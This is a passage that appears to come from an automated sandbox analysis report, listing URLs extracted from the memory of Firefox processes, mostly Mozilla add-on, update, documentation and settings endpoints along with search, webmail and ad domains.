Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4040738/cookie_autodelete-3.8.2.xpi
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4040738/cookie_autodelete-3.8.2.xpiThis
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4128570/languagetool-7.1.13.xpi
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4128570/languagetool-7.1.13.xpifirefox-desktop-spo
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4129240/privacy_badger17-2023.6.23.xpi
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4129240/privacy_badger17-2023.6.23.xpi(browserSett
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4134489/enhancer_for_youtube-2.0.119.1.xpi
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/firefox/downloads/file/4141092/facebook_container-2.3.11.xpi
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/506/506646-64.png?modified=mcrushed
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/700/700308-64.png?modified=4bc8e79f
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/708/708770-64.png?modified=4f881970
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/708/708770-64.png?modified=4f881970https://addons.
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/784/784287-64.png?modified=mcrushed
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/784/784287-64.png?modified=mcrushed(browserSetting
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/user-media/addon_icons/954/954390-64.png?modified=97d4c956
Source: firefox.exe, 00000019.00000003.1924224531.000001EBF367F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.orgADD_EXTENSION_BUTTON_PRIVACY_2
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.orgADD_EXTENSION_BUTTON_PRIVACY_2aboutConfigPrefs.onPrefChange
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1649737286.000001EBF34C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000019.00000003.1957522404.000001EBF8FC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://allegro.pl/
Source: firefox.exe, 00000019.00000003.1685119026.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://amazon.com
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://app.adjust.com/167k4ih?campaign=firefox-desktop&adgroup=pb&creative=focus-omc172&redirect=ht
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF3691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://app.adjust.com/a8bxj8j?campaign=firefox-desktop&adgroup=pb&creative=focus-omc172&redirect=ht
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 00000019.00000003.1885049515.000001EBEEC09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 00000019.00000003.2064766924.000001EBFE8FC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2089867380.000001EBFE8FC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1885923417.000001EBEDDA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1685119026.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1736195783.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3716622182.000002FB911C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A5B7000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.25.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1685119026.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1736195783.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3716622182.000002FB911C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A5B7000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.25.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: firefox.exe, 00000019.00000003.2074183845.000001EBFE052000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1170143
Source: firefox.exe, 00000019.00000003.1954084977.000001EBFF6EE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1953309267.000001EBFF6DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1189266
Source: firefox.exe, 00000019.00000003.1954084977.000001EBFF6EE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1953309267.000001EBFF6DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1193802
Source: firefox.exe, 00000019.00000003.1954742353.000001EBFF71E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1953309267.000001EBFF6CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1953309267.000001EBFF6DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1207993
Source: firefox.exe, 00000019.00000003.1954742353.000001EBFF71E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1953309267.000001EBFF6CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1266220
Source: firefox.exe, 00000019.00000003.1954084977.000001EBFF6EE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1953309267.000001EBFF6DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1283601
Source: firefox.exe, 00000019.00000003.1954742353.000001EBFF71E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1954084977.000001EBFF6EE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1953309267.000001EBFF6DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1678448
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1678942
Source: firefox.exe, 00000019.00000003.2057504268.000001EBFE59B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1694699#c21
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1817617
Source: firefox.exe, 00000019.00000003.1954084977.000001EBFF6EE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1953309267.000001EBFF6DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=792480
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=793869
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=806991
Source: firefox.exe, 00000019.00000003.1954742353.000001EBFF71E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1953309267.000001EBFF6CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1953309267.000001EBFF6DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=809550
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=815437
Source: firefox.exe, 00000019.00000003.1954742353.000001EBFF71E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1953309267.000001EBFF6CA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1953309267.000001EBFF6DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=840161
Source: firefox.exe, 00000019.00000003.1958859338.000001EBF365F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=951422
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 00000019.00000003.1957522404.000001EBF8FC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1562132964.000001EBF1863000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1561053890.000001EBF181A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1561368811.000001EBF1832000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1562472271.000001EBF1887000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1685119026.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1736195783.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3716622182.000002FB911C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A5B7000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.25.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: firefox.exe, 00000019.00000003.1958311114.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1685119026.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1736195783.000001EBED4B5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3716622182.000002FB911C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A5B7000.00000004.00000800.00020000.00000000.sdmp, prefs-1.js.25.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000019.00000003.1957095865.000001EBF9187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 00000019.00000003.1957095865.000001EBF9187000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com/
Source: firefox.exe, 00000019.00000003.1957095865.000001EBF9187000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 00000019.00000003.1651748408.000001EBF4F80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1651748408.000001EBF4FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
Source: firefox.exe, 00000019.00000003.1646738732.000001EBF3977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullSc
Source: firefox.exe, 00000019.00000003.1651748408.000001EBF4FDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1651748408.000001EBF4FAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 00000019.00000003.1651748408.000001EBF4FAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureWebExtensionUncheckedLastErr
Source: firefox.exe, 00000019.00000003.1651748408.000001EBF4F80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1651748408.000001EBF4FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
Source: firefox.exe, 00000019.00000003.1651748408.000001EBF4FAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureElementReleaseCaptureWarningElem
Source: firefox.exe, 00000019.00000003.1651748408.000001EBF4F80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1651748408.000001EBF4FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
Source: firefox.exe, 00000019.00000003.1646738732.000001EBF3977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#EncryptionPreventDefaultFromP
Source: firefox.exe, 00000019.00000003.1651748408.000001EBF4F80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1651748408.000001EBF4FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
Source: firefox.exe, 00000019.00000003.1646738732.000001EBF3977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnored
Source: firefox.exe, 00000019.00000003.2014148406.000001EBFD41F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Mozilla/Tech/XPCOM/Reference/Interface/nsIEffectiveTLDServi
Source: firefox.exe, 00000019.00000003.1685119026.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 00000019.00000003.2042940963.000001EBFE282000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1561927088.000001EBF184A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2026242987.000001EBFE276000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2008001558.000001EBFE276000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1562303877.000001EBF1875000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1560793169.000001EBF1600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1946884403.000001EBFE283000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1682385669.000001EBF241B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1562132964.000001EBF1863000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1561053890.000001EBF181A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1561368811.000001EBF1832000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 00000019.00000003.1882877986.000001EBEFCAE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1568418519.000001EBF1033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684134144.000001EBEFC9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2035398520.000001EBF1035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000019.00000003.1686603429.000001EBEFC9D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684134144.000001EBEFC9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 00000019.00000003.1686603429.000001EBEFC9D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684134144.000001EBEFC9B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 00000019.00000003.1882877986.000001EBEFCAE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1568418519.000001EBF1033000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1684134144.000001EBEFC9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2035398520.000001EBF1035000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000019.00000003.1651748408.000001EBF4F80000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1651748408.000001EBF4FDD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
Source: firefox.exe, 00000019.00000003.1651748408.000001EBF4FAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/SelectOptionsLengthAssignmentW
Source: firefox.exe, 00000019.00000003.1684357323.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1883544736.000001EBEEC57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3714616257.000001E51A512000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000019.00000003.1921482051.000001EBFDB04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1918480363.000001EBFD791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/673d2808-e5d8-41b9-957
Source: firefox.exe, 00000019.00000003.1921482051.000001EBFDB04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1921753296.000001EBFDB15000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1919778628.000001EBFD7B1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1918480363.000001EBFD791000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 00000019.00000003.1918480363.000001EBFD770000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/f0f51715-7f5e-48de-839
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 00000019.00000003.1656819383.000001EBF32D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1681951390.000001EBF32D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
Source: firefox.exe, 00000019.00000003.1885923417.000001EBEDD99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com
Source: firefox.exe, 00000019.00000003.1885923417.000001EBEDD99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/
Source: firefox.exe, 00000019.00000003.1883544736.000001EBEEC31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.1885923417.000001EBEDDA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/monitor/collections/changes/changeset?_expe
Source: firefox.exe, 00000019.00000003.2096280954.000001EBFDC3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/monitor/collections/changes/changeset?colle
Source: firefox.exe, 00000019.00000003.1735294322.000001EBEEC27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 0000001F.00000002.3715759309.000002FB91020000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000002.3718544513.000001E51A990000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
